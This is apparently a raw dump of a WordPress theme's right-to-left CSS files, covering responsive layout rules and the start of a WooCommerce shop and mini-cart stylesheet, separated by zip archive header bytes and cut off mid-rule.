.dark-mode-slide-btn.mode-icon-default { color: var(--body-fcolor); } body:not(.sticky-on) .header-transparent .navbar-inner .logo-default, body:not(.sticky-on) .header-transparent .navbar-inner .logo-dark, body .navbar-inner .logo-transparent { display: none; } body:not(.sticky-on) .header-transparent .logo-default { display: none; } body:not(.sticky-on) .navbar-inner .logo-transparent { display: block; } .yes-hd-transparent.is-standard-2 .header-transparent, .yes-hd-transparent.is-audio-2 .header-transparent, .yes-hd-transparent.is-video-2 .header-transparent { background-color: var(--dark-accent); } .heading-title > * { font-size: var(--heading-size-desktop, var(--heading-fsize, inherit)); } .format-style-bottom.format-size-big .p-format { padding: 10px 10px 7px 7px; } .format-style-bottom.format-size-big .p-format i { font-size: 24px; } .format-style-bottom.format-size-big .p-format .gallery-count { top: 5px; left: 5px; } .format-style-top.format-size-big .p-format i { font-size: 30px; } .format-style-center.format-size-big .post-format { font-size: 60px; } .format-style-top.format-size-big .gallery-count { font-size: 1rem; padding: 5px; } .hrc-3 .p-link { padding-bottom: 3px; } .block-hrc .p-wrap:first-child, .hrc-3 .sub-section { --bottom-spacing: 25px; } .rb-col-6 .cbox-featured { margin-bottom: 10px; } .p-meta.has-avatar { padding-top: 2px; } .meta-avatar { margin-left: 7px; } .p-link { padding-top: 5px; } .admin-bar .reading-indicator { top: 32px; } .s-feat-outer { margin-bottom: 40px; } .breadcrumb-absolute { padding: 10px 20px; } .s-hl-heading.h1 { font-size: 3.5rem; top: -15px; } .single-standard-1 .single-header { padding-top: 20px; padding-bottom: 10px; } .single-standard-1 .s-feat img { width: auto; max-width: 100%; } .single-standard-2 .single-header { margin-bottom: 40px; } .single-standard-7 .single-header { margin-bottom: 40px; } .single-standard-8 .grid-container { margin-top: 40px; } .single-standard-6 .single-header { margin-bottom: 40px; } .single-standard-2 .single-header-inner { padding-top: 40px; } .single-standard-3 .single-header, .single-standard-4 .single-header { padding-top: 10px; padding-bottom: 40px; } .single-standard-5 .single-header { padding-bottom: 40px; } .single-embed-2 .embed-audio .embed-holder, .single-embed-3 .embed-audio .embed-holder, .single-embed-4 .embed-audio .embed-holder { padding-bottom: 20%; } .single-embed-4 .single-header { margin-bottom: 40px; } .single-header-content { padding-right: 30px; padding-left: 30px; } .s-title, .s-tagline, .s-breadcrumb { margin-bottom: 20px; } .spon-qview { padding: 7px 20px; } .single-meta { margin-bottom: 30px; } .single .single-no-featured .single-header { margin-bottom: 30px; } .archive-header { padding-top: 40px; padding-bottom: 40px; } .archive-header.category-header-2 { margin-bottom: 50px; padding-top: 90px; padding-bottom: 90px; } .yes-hd-transparent .archive-header.category-header-2 { padding-top: calc(100px + var(--nav-height)); } .archive-header-content > *:not(:last-child) { margin-bottom: 20px; } .category-header-2 .block-qlinks { padding-top: 5px; } .blog-wrap { margin-top: 50px; margin-bottom: 50px; } .blog-wrap .block-h { margin-bottom: 25px; } .search-header { padding-top: 50px; } .yes-hd-transparent .search-header { padding-top: 110px; } .ecat-bg-1.ecat-size-big .p-top { padding-bottom: 3px; } .ecat-bg-1.ecat-size-big .feat-holder .p-top { padding-bottom: 0; } .ecat-bg-1.ecat-size-big .p-category, .ecat-bg-2.ecat-size-big .p-category, .ecat-bg-3.ecat-size-big .p-category, .ecat-border.ecat-size-big .p-category { font-size: 1.15em; padding: 8px 16px; } .ecat-bg-4.ecat-size-big .p-category { font-size: 1.15em; } .ecat-text.ecat-size-big .p-category, .ecat-b-border.ecat-size-big .p-category { font-size: 1.3em; } .ecat-b-dotted.ecat-size-big .p-category { font-size: 1.15em; border-bottom-width: 4px; } .meta-el:before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .bookmark-section-header-image { flex-shrink: 0; height: 45px; } .empty-saved { margin-top: 30px; margin-bottom: 30px; } .plist-item-thumb { width: 125px; } .author-header-inner .breadcrumb-wrap { margin-bottom: 20px; } .search-header-form .search-form, .page404-inner .search-form { font-size: 1.5rem; } .search-header-form .search-form input[type='search'], .page404-inner .search-form input[type='search'] { padding: 20px 5px 20px 20px; } .search-header-form .search-form-icon, .page404-inner .search-form-icon { padding-right: 15px; padding-left: 15px; } .search-header-content { margin-bottom: 40px; } .search-empty { margin-top: 50px; } #back-top { bottom: 40px; } .logged-welcome { display: inline-flex; } .page404-btn-wrap { padding-top: 20px; } .page-header-1 { margin-bottom: 40px; padding-top: 40px; } .page-header-2 { margin-bottom: 40px; padding-top: 100px; padding-bottom: 100px; } .page-header-2 .s-title { margin-bottom: 15px; } .page404-inner { padding-top: 60px; padding-bottom: 60px; } .page404-inner .page-title, .page404-inner .page404-description { margin-bottom: 25px; } .page404-inner input[type='search'] { font-size: 1rem; min-height: 54px; } .share-action.is-mobile { display: none; } .share-action.is-web { display: flex; display: -webkit-flex; } .sticky-sidebar .sidebar-inner { position: -webkit-sticky; position: sticky; top: 12px; padding-bottom: 12px; -webkit-transition: all .3s ease; transition: all .3s ease; will-change: top; } .admin-bar .sticky-sidebar .sidebar-inner, .admin-bar .l-shared-sec, .admin-bar .rb-sticky > * { top: 44px; } .sticky-on .sticky-sidebar .sidebar-inner, .sticky-on .l-shared-sec, .sticky-on .rb-sticky > * { top: calc(var(--nav-height) + 12px); } .sticky-on.admin-bar .sticky-sidebar .sidebar-inner, .sticky-on.admin-bar .l-shared-sec, .sticky-on.admin-bar .rb-sticky > * { top: calc(var(--nav-height) + 44px); } .admin-bar.sticky-on.is-mstick .sticky-holder, .admin-bar.sticky-on .e-section-sticky { margin-top: 32px; } .collapse-footer { padding: 20px; } .review-header .rstar-bg { background-image: linear-gradient(to left, var(--review-color) 96.5%, transparent 3.5%); background-size: 29px 28px; } .e-ct-outer > * { margin-bottom: 35px; } .s-hl { padding-bottom: 35px; } .yes-tstick.sticky-on .main-menu-wrap, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-mini-cart, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-notification-icon, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-login-icon, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-social-list, .yes-tstick.sticky-on .e-stitle-sticky .elementor-widget-foxiz-search-icon, .yes-tstick.sticky-on .navbar-right > *:not(.dark-mode-toggle-wrap):not(.font-resizer), .yes-tstick.sticky-on .more-section-outer { display: none; } .yes-tstick.sticky-on .s-title-sticky { display: flex; } .footer-columns .footer-col { flex-basis: 20%; width: 20%; } .footer-51c.footer-columns .footer-col { flex-basis: 15%; width: 15%; } .footer-4c .footer-col:first-child, .footer-4c .footer-col:last-child { flex-basis: 30%; width: 30%; } .footer-5c .footer-col:nth-child(1) { flex-basis: 20%; width: 20%; } .footer-51c .footer-col:nth-child(1) { flex-basis: 40%; width: 40%; } .footer-3c.footer-columns .footer-col { flex-basis: 25%; width: 25%; } .footer-3c.footer-columns .footer-col:nth-child(2) { flex-basis: 50%; width: 50%; } .footer-wrap.has-border .footer-col:not(:last-child) { border-left: 1px solid var(--flex-gray-15); } .review-header .rline { width: 30px; height: 10px; } .review-header .rstar { width: 28px; height: 28px; } .yt-playlist .yt-embed { flex: 0 0 66.67%; width: 66.67%; } .yt-playlist { display: flex; flex-flow: row nowrap; } .yt-playlist .plist-items { flex: 0 0 33.33%; width: 33.33%; } .p-big, .block-big .pagination-wrap { --el-spacing: 15px; --bottom-spacing: 40px; } .p-classic .feat-holder { margin-bottom: calc(var(--el-spacing) + 3px); } body .p-classic .meta-avatar img { width: 26px; height: 26px; } .single-post-outer.has-continue-reading .s-ct { height: 1200px; max-height: 1200px; } .rec-section { padding-top: 10px; padding-bottom: 10px; } .newsletter-form input { font-size: var(--rem-small); padding-top: 15px; padding-bottom: 15px; } .newsletter-box-2 .newsletter-inner > *:not(:last-child):not(.newsletter-featured) { margin-bottom: 30px; } .section-empty-inner .page-title { margin-bottom: 20px; padding-bottom: 20px; } .rbbsl a:nth-child(2) { padding: 0 15px; } .rbbsl a:nth-child(2) > span { display: inline-flex; } .category-hero-item:first-child:not(:last-child) { margin-bottom: 15px; margin-left: 15px; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { width: 50%; } .interest-content { margin-bottom: 50px; } .footer-quote { max-width: 240px; } .rb-col-2 .block-inner > *:nth-last-child(1), .rb-col-2 .block-inner > *:nth-last-child(2), .rb-col-3 .block-inner > *:nth-last-child(1), .rb-col-3 .block-inner > *:nth-last-child(2), .rb-col-3 .block-inner > *:nth-last-child(3), .rb-col-4 .block-inner > *:nth-last-child(1), .rb-col-4 .block-inner > *:nth-last-child(2), .rb-col-4 .block-inner > *:nth-last-child(3), .rb-col-4 .block-inner > *:nth-last-child(4), .rb-col-5 .block-inner > *:nth-last-child(1), .rb-col-5 .block-inner > *:nth-last-child(2), .rb-col-5 .block-inner > *:nth-last-child(3), .rb-col-5 .block-inner > *:nth-last-child(4), .rb-col-5 .block-inner > *:nth-last-child(5), .rb-col-6 .block-inner > *:nth-last-child(1), .rb-col-6 .block-inner > *:nth-last-child(2), .rb-col-6 .block-inner > *:nth-last-child(3), .rb-col-6 .block-inner > *:nth-last-child(4), .rb-col-6 .block-inner > *:nth-last-child(5), .rb-col-6 .block-inner > *:nth-last-child(6), .rb-col-7 .block-inner > *:nth-last-child(1), .rb-col-7 .block-inner > *:nth-last-child(2), .rb-col-7 .block-inner > *:nth-last-child(3), .rb-col-7 .block-inner > *:nth-last-child(4), .rb-col-7 .block-inner > *:nth-last-child(5), .rb-col-7 .block-inner > *:nth-last-child(6), .rb-col-7 .block-inner > *:nth-last-child(7) { margin-bottom: 0; } .rb-col-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-3.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-4.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-5.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-6.no-last-bb .block-inner > *:nth-last-child(6), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(1), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(2), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(3), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(4), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(5), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(6), .rb-col-7.no-last-bb .block-inner > *:nth-last-child(7) { padding-bottom: 0; --bottom-border-color: transparent; } } @media (max-width: 1024px) { :root { --h1-fsize: 34px; --h2-fsize: 24px; --h3-fsize: 20px; --headline-fsize: 34px; --bottom-spacing: 30px; } .site-outer { overflow-x: hidden; } .none-mobile-sb .single-sidebar, .navbar-wrap, .header-template-inner { display: none; } .header-mobile { display: flex; flex-flow: column nowrap; max-height: 100vh; } .notification-popup { width: 100vw; max-width: 100vw; } .is-mstick .navbar-outer { min-height: var(--mbnav-height, 42px); } .is-mstick .has-quick-menu .navbar-outer { min-height: calc(var(--mbnav-height, 42px) + 42px); } .privacy-bar.privacy-left { bottom: 10px; left: 20px; width: auto; } .qlink a { white-space: nowrap; } .qlinks-content { overflow: hidden; } .qlinks-content ul { overflow-x: auto; flex-flow: row nowrap; scrollbar-width: none; -ms-overflow-style: none; } .qlinks-content ul::-webkit-scrollbar { width: 0; height: 0; } .plist-items { height: 300px; } .plist-holder { padding-top: 70px; } .sidebar-inner { max-width: 370px; margin-top: 40px; margin-right: auto; margin-left: auto; } .single-post .sidebar-inner { margin-top: 15px; } .logo-wrap img.logo-transparent, .logo-sec { display: none; } } /** vertical tablet and mobile */ @media (max-width: 991px) { .is-gap-25 .block-inner, .is-gap-30 .block-inner, .is-gap-35 .block-inner { margin-right: -20px; margin-left: -20px; } .is-gap-25 > .block-inner > *, .is-gap-30 > .block-inner > *, .is-gap-35 > .block-inner > * { padding-right: 20px; padding-left: 20px; } .footer-wrap > *:first-child { padding-top: 40px; } .w-sidebar { margin-bottom: 40px; } .single-meta { flex-flow: column-reverse nowrap; } .single-meta > * { width: 100%; } .smeta-extra { margin-top: 2px; margin-bottom: 17px; padding: 4px 12px; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .t-shared-sec .share-action, .sticky-share-list .share-action { font-size: 14px; } .single-standard-2 .single-header-inner:before, .embed-bg-overlay { bottom: 90px; } .single-standard-3 .single-header-inner:before, .single-standard-4 .single-header-inner:before { padding-bottom: 60%; } .single-header-columns { flex-flow: row wrap; } .single-standard-6 .s-feat-outer { flex: 0 0 100%; } .single-header-left { flex: 0 0 100%; padding-top: 20px; padding-bottom: 10px; } .featured-vertical { padding-bottom: 66.67%; border-radius: var(--round-5); } .burger-icon { color: var(--mbnav-color, var(--nav-color)); } } /** mobile */ @media (max-width: 767px) { :root { --body-fsize: 15px; --h1-fsize: 26px; --headline-fsize: 26px; --h2-fsize: 21px; --h3-fsize: 17px; --h4-fsize: 15px; --h5-fsize: 14px; --h6-fsize: 14px; --cat-fsize: 10px; --meta-fsize: 12px; --eauthor-fsize: 12px; --bcrumb-fsize: 11px; --rem-mini: .7rem; --btn-fsize: 11px; --height-34: 28px; --height-40: 34px; --padding-40: 0 20px; --h1-fheight: 1.3; --h2-fheight: 1.3; --h3-fheight: 1.4; --dwidgets-fsize: 12px; --tagline-fsize: 17px; --tagline-s-fsize: 17px; --excerpt-fsize: 13px; --el-spacing: 10px; } .col-border.rb-mcol-2 .block-inner > *:nth-child(2n+1):after { position: absolute; top: 0; right: auto; bottom: 0; left: 0; width: 1px; height: 100%; content: ''; pointer-events: none; border-left: 1px var(--column-border-style, solid) var(--column-border-color); } .meta-el:not(.mobile-hide) + .meta-el:not(.mobile-hide):before { display: inline-flex; width: 3px; height: 3px; margin-right: .6em; margin-left: .6em; content: ''; opacity: .5; border-radius: 100%; background-color: currentColor; } .p-overlay { --bottom-spacing: 10px; } input[type='text'], input[type='tel'], input[type='password'], input[type='email'], input[type='url'], input[type='search'], input[type='number'], textarea { padding: 7px 15px; } .rb-mcol-1 > .block-inner > * { flex-basis: 100%; width: 100%; } .rb-mcol-2 > .block-inner > * { flex-basis: 50%; width: 50%; } .rb-mcol-3 > .block-inner > * { flex-basis: 33.33%; width: 33.33%; } .rb-mcol-4 > .block-inner > * { flex-basis: 25%; width: 25%; } body .mobile-hide, body .mobile-hide + .spacing, .review-meta-inner .extra-meta, .sponsor-label { display: none; } .ecat-bg-1 .p-category, .ecat-bg-2 .p-category { padding: 5px 10px; } .rstar-bg { background-image: -webkit-linear-gradient(right, var(--review-color) 93.75%, transparent 6.25%); background-image: linear-gradient(to left, var(--review-color) 93.75%, transparent 6.25%); background-size: 16px 15px; } span.rstar { width: 15px; height: 15px; } .rstar i { font-size: 11px; } .rline { width: 15px; height: 5px; } body .meta-avatar img { width: 20px; height: 20px; } .block-list-small-1 .scroll-holder { max-height: none; } .hrc-3 .overlay-wrap, .overlay-1 .overlay-wrap { position: relative; overflow: visible; } .p-highlight.ecat-bg-1 .overlay-inner, .p-highlight.ecat-bg-2 .overlay-inner, .p-highlight.ecat-bg-3 .overlay-inner { padding-top: 0; } .p-highlight.ecat-bg-1 .p-top, .p-highlight.ecat-bg-2 .p-top, .p-highlight.ecat-bg-3 .p-top { margin-top: -1em; } .post-slider .slider-prev, .post-slider .slider-next { font-size: 1.25rem; width: 40px; height: 40px; } .hrc-3 .p-highlight { border-radius: 0; } .hrc-3 .ratio-v1 { padding-bottom: 66.67%; } .collapse-footer-menu .menu-item a > span { font-size: var(--em-small); } .rb-user-popup-form { max-width: 90%; } .logo-popup-outer { padding: 20px; } .p-grid-small-1 { display: flex; align-items: flex-start; flex-flow: row-reverse nowrap; width: 100%; --bottom-spacing: 25px; } .p-grid-small-1.m-featured-left { flex-flow: row nowrap; } .p-content { flex-grow: 1; } .list-box .p-featured { -webkit-border-bottom-right-radius: 0; border-bottom-right-radius: 0; -webkit-border-bottom-left-radius: 0; border-bottom-left-radius: 0; } .list-box .p-content { margin: 0 var(--box-spacing) var(--box-spacing); } .list-box .feat-holder .p-top { padding-right: var(--box-spacing) } .list-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--box-color, var(--solid-light)); } [data-theme='dark'] .list-box .entry-format-absolute.format-style-bottom .p-format, .light-scheme .list-box .entry-format-absolute.format-style-bottom .p-format { background-color: var(--dark-box-color, var(--solid-light)); } .p-grid-small-1 .feat-holder { flex-shrink: 0; width: 135px; margin-right: 20px; margin-bottom: 0; } .p-grid-small-1.m-featured-left .feat-holder { margin-right: 0; margin-left: 20px; } .follow-button { font-size: 11px; } .page404-featured img { max-height: 200px; } .page404-description, .taxonomy-description { font-size: var(--rem-small); } .search-form input[type='search'] { padding: 10px 5px 10px 10px; } .plist-item { padding: 10px; } .yt-trigger { width: 54px; } .yt-trigger-icons svg { width: 26px; } .copyright-inner { flex-direction: column-reverse; text-align: center; } .copyright-menu { flex-flow: row wrap; justify-content: center; margin-right: 0; margin-bottom: 12px; } .smeta-in > .meta-avatar { margin-left: 10px; } .smeta-in > .meta-avatar img { width: 42px; } .l-shared-sec-outer { display: none; } .single-header-content { padding: 0 15px; } .has-lsl .e-ct-outer, body .has-lsl .e-ct-outer { width: 100%; max-width: 100%; } .e-shared-header span { display: none; } .rbbsl { font-size: 14px; } .rbbsl > * { margin-left: 7px; padding: 0 15px; } .entry-sec { padding-top: 27px; padding-bottom: 25px; } .user-rating svg { width: 1em; } .review-feat { width: 70px; } .single-standard-7 .single-header { padding-top: 15px; } .single-standard-8 .grid-container { margin-top: 15px; } .feat-caption .caption-text:before { width: 30px; margin-left: 10px; } .attribution { padding-right: 0; } .review-content { padding: 15px; } .review-footer { margin-right: 20px; margin-left: 20px; } .pros-cons .inner > * { flex: 0 0 100%; justify-content: flex-start; width: 100%; } .pros-cons .inner > *:first-child { margin-bottom: 20px; } .review-footer > *:not(.review-action) { padding: 22px 0 20px 0; } .pros-cons-title { padding-bottom: 0; } .single-standard-2 .single-header-inner:before, .embed-bg-overlay { bottom: 50px; } .category-header-1 .archive-inner { align-items: flex-start; flex-flow: column nowrap; } .category-header-1 .category-hero-wrap { align-items: flex-start; width: calc(100% - 25px); margin-top: 25px; padding-bottom: 20px; } .p-grid-small-1 .feat-holder { flex-shrink: 0; width: 100%; max-width: 100px; margin-right: 15px; } .p-grid-small-1 .p-content { flex-grow: 1; } .cbox { --bottom-spacing: 10px; } .cbox-inner { display: flex; align-items: stretch; flex-flow: row nowrap; } .cbox-featured { flex-shrink: 0; width: 90px; padding-bottom: 0; } .popup-newsletter-inner { flex-flow: row wrap; } .popup-newsletter-inner > * { width: 100%; } .popup-newsletter-cover-holder { padding-bottom: 5px; } .popup-newsletter-content { padding: 20px; } .table-link-depth { margin-right: 15px; } .embed-audio .embed-holder { padding-bottom: 50%; } .format-gallery-coverflow .swiper-pagination { margin-top: 10px; } .page-selected { position: static; } .page-selected-outer { position: relative; border-right: 5px solid var(--g-color); border-radius: var(--round-5); } .page-selected-list { right: 0; left: 0; } .page-selected-title { display: none; } .newsletter-form { flex: 0 0 100%; max-width: 100%; margin-top: 20px; } .newsletter-featured { flex: 0 0 25%; max-width: 25%; padding-left: 0; } .newsletter-content { flex: 0 0 75%; max-width: 75%; } .footer-wrap:after { display: none; } .p-grid-small-1 .p-format { font-size: 16px; } .p-list-2.ecat-bg-1 .p-top, .p-list-2.ecat-bg-2 .p-top, .p-list-2.ecat-bg-3 .p-top { margin-top: calc(-2px - var(--el-spacing) - 1em); padding-right: 7px; } .current-slider-info .h4 { font-size: 9px; } span.current-slider-count { font-size: 1.5em; } .entry-sec:before, .review-footer > *:not(.review-action):before, .mobile-collapse-sections:before { height: 2px; } h1.search-title { font-size: var(--h2-fsize); } .search-subtitle { font-size: var(--rem-small); margin-top: 5px; } .bookmark-info { bottom: 20px; } .ubio-inner { flex-flow: column nowrap; justify-content: center; text-align: center; } .ubio-inner { flex-flow: column nowrap; justify-content: center; text-align: center; } .bio-avatar { width: 80px; height: 80px; margin-bottom: 12px; margin-left: 0; } .bio-count-posts { display: none; } .bio-description { font-size: var(--em-mini); } .bio-content .usocials { justify-content: center; padding-top: 3px; } .breaking-news-heading { margin-left: 3px; padding: 0; background-color: transparent; -webkit-box-shadow: none; box-shadow: none; } .breaking-news-heading span { display: none; } .newsletter-description { font-size: var(--rem-mini); } .qlinks-heading > span { display: none; } .newsletter-inner { padding-right: 0; padding-left: 0; } .rb-mcol-2 .block-inner > *:nth-last-child(1), .rb-mcol-2 .block-inner > *:nth-last-child(2), .rb-mcol-3 .block-inner > *:nth-last-child(1), .rb-mcol-3 .block-inner > *:nth-last-child(2), .rb-mcol-3 .block-inner > *:nth-last-child(3) { margin-bottom: 0; } .rb-mcol-2.no-last-bb .block-inner > *:nth-last-child(1), .rb-mcol-2.no-last-bb .block-inner > *:nth-last-child(2), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(1), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(2), .rb-mcol-3.no-last-bb .block-inner > *:nth-last-child(3) { padding-bottom: 0; --bottom-border-color: transparent; } .wp-block-pullquote { padding: 1.5em 0; } .wp-block-pullquote.alignleft, .wp-block-pullquote.alignright { float: none; max-width: 100%; margin-right: 0; margin-left: 0; } .wp-block-pullquote p { font-size: 1.15em; } .widget_rss cite:before, .wp-block-quote cite:before, .wp-block-pullquote cite:before { width: 20px; } .rbct .wp-block-pullquote cite { font-size: var(--rem-mini); } .newsletter-icon svg { width: 40px; } .e-pagi.mobile-hide { display: none; } .e-pagi img { display: none; } .e-pagi span.p-url { font-size: var(--em-small); } .e-pagi { margin-right: -10px; margin-left: -10px; } .e-pagi .nav-el { padding-right: 10px; padding-left: 10px; } .reaction-heading { margin-bottom: 15px; } .reaction { flex: 0 0 44px; max-width: 44px; padding: 5px; } .reaction-icon svg { width: 36px; height: 36px; } .reaction .reaction-title, .reaction.active .reaction-count { font-size: var(--rem-mini); } .has-drop-cap:not(:focus):first-letter { font-size: 3.5em; line-height: .9; } .e-pagi .nav-label { margin-bottom: 7px; } .top-site-ad:not(.no-spacing) { padding-top: 10px; padding-bottom: 10px; } .author-avatar { width: 36px; } .nname-info .meta-label, .ef-label { display: none; } .footer-logo { height: calc(var(--flogo-height, 50px) * .8); } .bookmark-featured { width: 70px; } .bookmark-title { width: 205px; } .top-footer-inner > *:not(:last-child) { margin-bottom: 35px; } .grid-masonry .grid-holder.rb-masonry { display: grid; grid-gap: 5px; grid-template-columns: auto auto auto auto; } .grid-fmasonry .grid-holder.rb-masonry { display: grid; grid-gap: 5px; grid-template-columns: auto auto auto auto auto; } .grid-default .grid-holder { display: grid; grid-template-columns: auto auto auto; grid-gap: 5px; } .grid-masonry .grid-el:nth-child(2) { grid-column: 1 / span 2; grid-row: 1 / span 2; } .grid-masonry .grid-el:first-child { height: 100%; grid-column: 3 / span 2; grid-row: 1; } .grid-masonry .grid-el:nth-child(3) { height: 100%; grid-column: 3 / span 1; grid-row: 2; } .grid-masonry .grid-el:nth-child(5) { height: 100%; grid-column: 1 / span 2; grid-row: 3; } .grid-masonry .grid-el:last-child { grid-column: 3 / span 2; grid-row: 3 / span 2; } .grid-fmasonry .grid-el:nth-child(3) { grid-column: 2 / span 2; grid-row: 1 / span 2; } .grid-fmasonry .grid-el:nth-child(4) { height: 100%; grid-column: 4 / span 2; grid-row: 1; } .grid-fmasonry .grid-el:nth-child(6) { grid-column: 1 / span 2; grid-row: 3 / span 2; } .grid-fmasonry .grid-el:nth-child(9) { height: 100%; grid-column: 3 / span 2; grid-row: 4; } .grid-fmasonry .grid-el:nth-child(4) .instagram-box, .grid-fmasonry .grid-el:nth-child(9) .instagram-box, .grid-masonry .grid-el:first-child .instagram-box, .grid-masonry .grid-el:nth-child(5) .instagram-box { padding-bottom: 50%; } .rb-header-name.h6 { font-size: 1.7rem; } .rb-w-header .col-right .rb-w-units { font-size: 3.3rem; } .rb-w-big-icon svg { width: 76px; height: 76px; } .rb-w-desc { font-size: .75rem; } .w-forecast-icon svg { width: 36px; height: 36px; } .is-style-10 .fnicon i, .is-style-11 .fnicon i { font-size: 1rem; width: 44px; height: 44px; } .is-style-15 .social-follower, .is-style-14 .social-follower, .is-style-8 .social-follower, .is-style-7 .social-follower, .is-style-6 .social-follower, .is-style-5 .social-follower, .is-style-4 .social-follower, .is-style-3 .social-follower, .is-style-15 .social-follower, .is-style-14 { margin: -3px; } .is-style-9 .social-follower, .is-style-2 .social-follower, .is-style-1 { margin: -5px; } .is-style-9 .follower-inner, .is-style-2 .follower-inner, .is-style-1 .follower-inner { margin: 5px; } .is-style-8 .follower-inner, .is-style-7 .follower-inner, .is-style-6 .follower-inner, .is-style-5 .follower-inner, .is-style-4 .follower-inner, .is-style-3 .follower-inner { margin: 3px; padding: 12px 5px 10px 5px; } .is-style-10 .follower-el, .is-style-11 .follower-el { margin-bottom: 10px; } .is-style-12 .follower-el, .is-style-13 .follower-el { margin-bottom: 7px; } .w-banner { padding-top: 50px; padding-bottom: 50px; } .post-slider { position: relative; overflow: hidden; border-radius: var(--round-3); background-color: var(--dark-accent); } .p-list-1 .list-feat-holder, .p-list-2 .list-feat-holder { width: 100% !important; min-width: 100%; max-width: 100% !important; margin-bottom: calc(var(--el-spacing) + 2px); } .ad-description { font-size: 10px; } .pagination-nextprev > * { min-width: 90px; } .short-pagination .pagination-nextprev > * { min-width: 0; } .wpcf7-form .wpcf7-form-control-wrap { width: 100%; max-width: 100%; padding-top: 7px; padding-bottom: 7px; } .cbox-center { display: none; } .heading-layout-c8 .heading-title:before, .heading-layout-c8 .heading-title:after { width: 40px; } .intro-content { display: none; } .textwidget br, .textwidget p { font-size: var(--rem-small); } } @media all { .p-content > *:last-child, .block-inner > *:last-child, .rb-col-1 .block-inner > *:last-child { margin-bottom: 0; } }PK!p! assets/css/woocommerce-rtl.cssnu[.wc-wrap { padding-top: 40px; } .shop-page { margin-bottom: 40px; } /** product columns */ .products[class*='wc-col'] { display: flex; display: -webkit-flex; align-items: flex-start; flex: 100%; flex-flow: row wrap; width: 100%; } .products > * { flex: 0 0 100%; max-width: 100%; } .product-thumb img { width: 100%; height: auto; } .wc-entry-content ul, .wc-entry-content ol { list-style: none; } .wc-entry-content li:not(:last-child) { margin-bottom: 5px; } .woocommerce .form-row:not(:last-child ) { margin-bottom: 15px; } .shipping-calculator-button { -webkit-transition: var(--effect); transition: var(--effect); text-decoration: underline dotted; } .shipping-calculator-button:hover { color: var(--g-color) } .woocommerce-form-login .button, .woocommerce-form-register .button, .return-to-shop .button { font-size: 1rem; margin-top: 12px; } .woocommerce-notices-wrapper ul { font-size: var(--rem-small); padding: 15px; list-style: none; border: 1px solid var(--flex-gray-15); border-radius: var(--round-3); } .woocommerce-notices-wrapper ul.woocommerce-error { border-color: #fcac56; } .woocommerce-notices-wrapper { padding-bottom: 20px; } /** mini cart */ .cart-icon { position: relative; display: flex; flex-flow: row nowrap; justify-content: flex-start; } .cart-link { display: flex; align-items: center; } .cart-counter { font-size: 10px; font-style: normal; z-index: 1; display: flex; align-items: center; justify-content: center; width: 16px; height: 16px; margin-top: -2px; margin-left: -5px; margin-right: -8px; text-align: center; color: var(--absolute-white); border-radius: 100%; background-color: var(--g-color); } .nav-mini-cart { min-width: 320px; padding: 25px 20px; } .woocommerce-mini-cart-item, .product_list_widget li { line-height: 1; position: relative; display: block; } .product_list_widget a { display: block; margin-bottom: 7px; } .woocommerce-mini-cart-item { padding-left: 25px; } .woocommerce-mini-cart-item:not(:last-child), .product_list_widget li:not(:last-child) { margin-bottom: 20px; } .woocommerce-mini-cart-item a:not(.remove), td.product-name, .product_list_widget .product-title { font-family: var(--product-family); font-size: var(--rem-mini); font-weight: var(--product-fweight); font-style: var(--product-fstyle); line-height: var(--product-fheight, 1.5); letter-spacing: var(--product-fspace); text-transform: var(--product-transform); } .woocommerce ul.cart_list li img, .woocommerce ul.product_list_widget li img, .woocommerce-page ul.cart_list li img, .woocommerce-page ul.product_list_widget li img { float: right; max-width: 80px; margin-left: 15px; } a.remove { font-size: 0; position: absolute; top: 5px; left: 0; display: block; min-width: 15px; height: 20px; transition: var(--effect); --webkit-transition: var(--effect); } a.remove:hover { color: var(--g-color); } a.remove:before { font-family: 'ruby-icon' !important; font-size: 14px; position: absolute; top: 0; right: 0; display: flex; align-items: center; justify-content: center; width: 100%; height: 100%; content: '\e964'; color: inherit; } .woocommerce-NoticeGroup { margin-bottom: 15px; padding: 10px; border: 1px solid #ff826f50; border-radius: 3px; } .woocommerce-mini-cart-item .quantity { font-size: var(--rem-small); display: block; margin-top: 12px; } .woocommerce .product_list_widget .star-rating, .reviewer { display: block; margin-top: 7px; } .woocommerce-mini-cart__empty-message, .woocommerce-review-link, .reviewer { font-size: var(--rem-mini); opacity: .5; } .woocommerce-mini-cart__total { display: flex; align-items: center; justify-content: space-between; margin-top: 15px; padding-top: 10px; border-top: 3px solid 